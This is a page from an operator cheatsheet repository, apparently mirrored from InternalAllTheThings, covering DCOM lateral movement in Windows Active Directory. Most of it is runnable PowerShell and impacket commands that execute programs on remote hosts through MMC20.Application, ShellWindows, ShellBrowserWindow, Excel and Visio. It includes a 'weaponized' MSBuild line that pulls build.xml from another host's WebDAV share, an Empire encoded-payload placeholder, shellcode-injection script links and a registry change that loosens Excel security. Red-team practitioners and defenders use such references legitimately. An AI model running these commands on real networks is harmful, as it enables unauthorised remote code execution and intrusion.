daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

internal-dcom.md (6287B)


      1 ---
      2 title: "Internal - DCOM"
      3 section: "Active Directory"
      4 sectionSlug: "active-directory"
      5 sourcePath: "docs/active-directory/internal-dcom.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/internal-dcom.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Internal - DCOM
     12 
     13 > DCOM is an extension of COM (Component Object Model), which allows applications to instantiate and access the properties and methods of COM objects on a remote computer.
     14 
     15 * [impacket/dcomexec.py](https://github.com/fortra/impacket/blob/master/examples/dcomexec.py)
     16 
     17   ```ps1
     18   dcomexec.py [-h] [-share SHARE] [-nooutput] [-ts] [-debug] [-codec CODEC] [-object [{ShellWindows,ShellBrowserWindow,MMC20}]] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] [-A authfile] [-keytab KEYTAB] target [command ...]
     19   dcomexec.py -share C$ -object MMC20 '<DOMAIN>/<USERNAME>:<PASSWORD>@<MACHINE_CIBLE>'
     20   dcomexec.py -share C$ -object MMC20 '<DOMAIN>/<USERNAME>:<PASSWORD>@<MACHINE_CIBLE>' 'ipconfig'
     21 
     22   python3 dcomexec.py -object MMC20 -silentcommand -debug $DOMAIN/$USER:$PASSWORD\$@$HOST 'notepad.exe'
     23   # -object MMC20 specifies that we wish to instantiate the MMC20.Application object.
     24   # -silentcommand executes the command without attempting to retrieve the output.
     25   ```
     26 
     27 * [klezVirus/CheeseTools](https://github.com/klezVirus/CheeseTools)
     28 
     29   ```powershell
     30   # https://klezvirus.github.io/RedTeaming/LateralMovement/LateralMovementDCOM/
     31   -t, --target=VALUE         Target Machine
     32   -b, --binary=VALUE         Binary: powershell.exe
     33   -a, --args=VALUE           Arguments: -enc <blah>
     34   -m, --method=VALUE         Methods: MMC20Application, ShellWindows,
     35                               ShellBrowserWindow, ExcelDDE, VisioAddonEx,
     36                               OutlookShellEx, ExcelXLL, VisioExecLine, 
     37                               OfficeMacro
     38   -r, --reg, --registry      Enable registry manipulation
     39   -h, -?, --help             Show Help
     40 
     41   Current Methods: MMC20.Application, ShellWindows, ShellBrowserWindow, ExcelDDE, VisioAddonEx, OutlookShellEx, ExcelXLL, VisioExecLine, OfficeMacro.
     42   ```
     43 
     44 * [rvrsh3ll/Misc-Powershell-Scripts/Invoke-DCOM.ps1](https://raw.githubusercontent.com/rvrsh3ll/Misc-Powershell-Scripts/master/Invoke-DCOM.ps1)
     45 
     46   ```powershell
     47   Import-Module .\Invoke-DCOM.ps1
     48   Invoke-DCOM -ComputerName '10.10.10.10' -Method MMC20.Application -Command "calc.exe"
     49   Invoke-DCOM -ComputerName '10.10.10.10' -Method ExcelDDE -Command "calc.exe"
     50   Invoke-DCOM -ComputerName '10.10.10.10' -Method ServiceStart "MyService"
     51   Invoke-DCOM -ComputerName '10.10.10.10' -Method ShellBrowserWindow -Command "calc.exe"
     52   Invoke-DCOM -ComputerName '10.10.10.10' -Method ShellWindows -Command "calc.exe"
     53   ```
     54 
     55 ## DCOM via MMC Application Class
     56 
     57 This COM object (MMC20.Application) allows you to script components of MMC snap-in operations. there is a method named **"ExecuteShellCommand"** under **Document.ActiveView**.
     58 
     59 ```ps1
     60 PS C:\> $com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","10.10.10.1"))
     61 PS C:\> $com.Document.ActiveView.ExecuteShellCommand("C:\Windows\System32\calc.exe",$null,$null,7)
     62 PS C:\> $com.Document.ActiveView.ExecuteShellCommand("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",$null,"-enc DFDFSFSFSFSFSFSFSDFSFSF < Empire encoded string > ","7")
     63 
     64 # Weaponized example with MSBuild
     65 PS C:\> [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","10.10.10.1")).Document.ActiveView.ExecuteShellCommand("c:\windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",$null,"\\10.10.10.2\webdav\build.xml","7")
     66 ```
     67 
     68 [n0tty/powershellery/Invoke-MMC20RCE.ps1](https://raw.githubusercontent.com/n0tty/powershellery/master/Invoke-MMC20RCE.ps1)
     69 
     70 ## DCOM via Office
     71 
     72 * Excel.Application
     73     * DDEInitiate
     74     * RegisterXLL
     75 * Outlook.Application
     76     * CreateObject->Shell.Application->ShellExecute
     77     * CreateObject->ScriptControl (office-32bit only)
     78 * Visio.InvisibleApp (same as Visio.Application, but should not show the Visio window)
     79     * Addons
     80     * ExecuteLine
     81 * Word.Application
     82     * RunAutoMacro
     83 
     84 ```ps1
     85 # Powershell script that injects shellcode into excel.exe via ExecuteExcel4Macro through DCOM
     86 Invoke-Excel4DCOM64.ps1 https://gist.github.com/Philts/85d0f2f0a1cc901d40bbb5b44eb3b4c9
     87 Invoke-ExShellcode.ps1 https://gist.github.com/Philts/f7c85995c5198e845c70cc51cd4e7e2a
     88 
     89 # Using Excel DDE
     90 PS C:\> $excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "$ComputerName"))
     91 PS C:\> $excel.DisplayAlerts = $false
     92 PS C:\> $excel.DDEInitiate("cmd", "/c calc.exe")
     93 
     94 # Using Excel RegisterXLL
     95 # Can't be used reliably with a remote target
     96 Require: reg add HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations /v AllowsNetworkLocations /t REG_DWORD /d 1
     97 PS> $excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "$ComputerName"))
     98 PS> $excel.RegisterXLL("EvilXLL.dll")
     99 
    100 # Using Visio
    101 $visio = [activator]::CreateInstance([type]::GetTypeFromProgID("Visio.InvisibleApp", "$ComputerName"))
    102 $visio.Addons.Add("C:\Windows\System32\cmd.exe").Run("/c calc")
    103 ```
    104 
    105 ## DCOM via ShellExecute
    106 
    107 ```ps1
    108 $com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"10.10.10.1")
    109 $obj = [System.Activator]::CreateInstance($com)
    110 $item = $obj.Item()
    111 $item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0)
    112 ```
    113 
    114 ## DCOM via ShellBrowserWindow
    115 
    116 :warning: Windows 10 only, the object doesn't exists in Windows 7
    117 
    118 ```ps1
    119 $com = [Type]::GetTypeFromCLSID('C08AFD90-F2A1-11D1-8455-00A0C91F3880',"10.10.10.1")
    120 $obj = [System.Activator]::CreateInstance($com)
    121 $obj.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0)
    122 ```
    123 
    124 ## References
    125 
    126 * [Lateral movement via dcom: round 2 - enigma0x3 - January 23, 2017](https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/)
    127 * [New lateral movement techniques abuse DCOM technology - Philip Tsukerman - January 25, 2018](https://www.cybereason.com/blog/dcom-lateral-movement-techniques)
    128 * [Non-administrative DCOM Execution: Exploring BloodHound's ExecuteDCOM - simondotsh - December 29, 2021](https://simondotsh.com/infosec/2021/12/29/dcom-without-admin.html)